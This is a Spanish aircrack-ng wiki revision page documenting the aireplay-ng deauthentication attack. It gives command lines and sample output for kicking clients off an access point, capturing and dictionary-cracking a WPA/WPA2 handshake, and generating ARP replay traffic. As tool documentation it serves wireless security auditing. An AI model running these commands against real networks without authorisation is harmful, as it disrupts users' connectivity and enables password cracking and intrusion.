Herramientas de usuario

Herramientas del sitio


es:deauthentication

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
es:deauthentication [2009/08/14 17:18] – --- mister_xes:deauthentication [2009/08/14 17:40] (actual) – updated spanish links mister_x
Línea 1: Línea 1:
 +====== Deautenticación ======
  
 +===== Descripción =====
 +Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso.  Las razones por las que es útil desasociar clientes pueden ser:
 +
 +    * Recuperar o desvelar un ESSID oculto.  Este es un ESSID que no es divulgado o anunciado por el AP.
 +    * Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar
 +    * Generar peticiones ARP (en Windows, algunas veces, los clientes borran su "ARP cache" cuando son desconectados)
 +
 +Por supuesto, este ataque es totalmente inútil si no existen clientes wireless asociados.
 +
 +=====  Uso =====
 +
 +   aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
 +
 +Donde:
 +  * -0 significa deautenticación
 +  * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente
 +  * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
 +  * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes
 +  *ath0 es el nombre de la interface
 +
 +===== Ejemplos de uso =====
 +
 +==== Deautenticación típica ====
 +Primero, es necesario averiguar si hay algún cliente actualmente conectado.  Necesitaremos su dirección MAC para el siguiente comando:
 +
 +aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
 +
 +Donde:
 +  * -0 significa deautenticación
 +  * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras)
 +  * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
 +  * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente que queremos deautenticar
 +  *ath0 es el nombre de la interface
 +
 +La salida será algo similar a esto:
 +
 +   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]
 +
 +==== Captura del Handshake WPA/WPA2  con Atheros ====
 +
 +  airmon-ng start ath0
 +  airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0  (y abrimos otra consola)
 +  aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0
 +  (esperamos algunos segundos)
 +  aircrack-ng -w /path/to/dictionary out.cap
 +
 +A continuación explicamos estos comandos:
 +
 +airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0\\
 +Donde:
 +  *-c 6 es el número del canal
 +  *--bssid 00:14:6C:7E:40:80 limita los paquetes capturados únicamente a este punto de acceso
 +  *-w out es el nombre del archivo donde se guardarán las capturas
 +  *ath0 es el nombre de la interface
 +
 +aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0\\
 +Donde:
 +  *-0 significa ataque de deautenticación
 +  *5 es el número de paquetes de deautenticación a enviar
 +  *-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
 +  *-c 00:0F:B5:AB:CB:9D es la dirección MAC del cliente que queremos deautenticar
 +  *ath0 es el nombre de la interface
 +
 +A continuación puedes ver la salida del comando "aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0"
 +
 +   12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 +   12:55:56  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 +   12:55:57  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 +   12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 +   12:55:58  Sending DeAuth to station   -- STMAC: [00:0F:B5:AB:CB:9D]
 +
 +==== Generar peticiones ARP con una tarjeta Prism2 ====
 +
 +  airmon-ng start wlan0
 +  airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0  (abrimos otra consola)
 +  aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0
 +  aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
 +
 +Despues de enviar los 10 paquetes de deautenticación, comenzamos a escuchar para "pescar" algún "ARP requests" con el ataque 3. La opción -h es obligatoria y tiene que ser la dirección MAC de un cliente asociado.
 +
 +Si estás usando el driver [[http://www.linux-wlan.com/linux-wlan|wlan-ng/]], deberías ejecutar el script [[airmon-ng]] (a menos que sepas lo que estás haciendo) o sino la tarjeta no funcionará de forma correcta para poder inyectar.
 +
 +===== Pistas de uso =====
 +
 +Es más efectivo atacar a un cliente determinado usando la opción -c.
 +
 +Los paquetes de deautenticación son enviados directamente desde el PC a los clientes.  Por lo que se debe comprobar que estamos físicamente cerca de los clientes para que les lleguen los paquetes que enviamos desde nuestra tarjeta wireless. (En [[airodump-ng]] mirar el PWR de los clientes y no el del AP)
 +
 +===== Problemas de uso =====
 +
 +Ninguno por el momento.
es/deauthentication.txt · Última modificación: 2009/08/14 17:40 por mister_x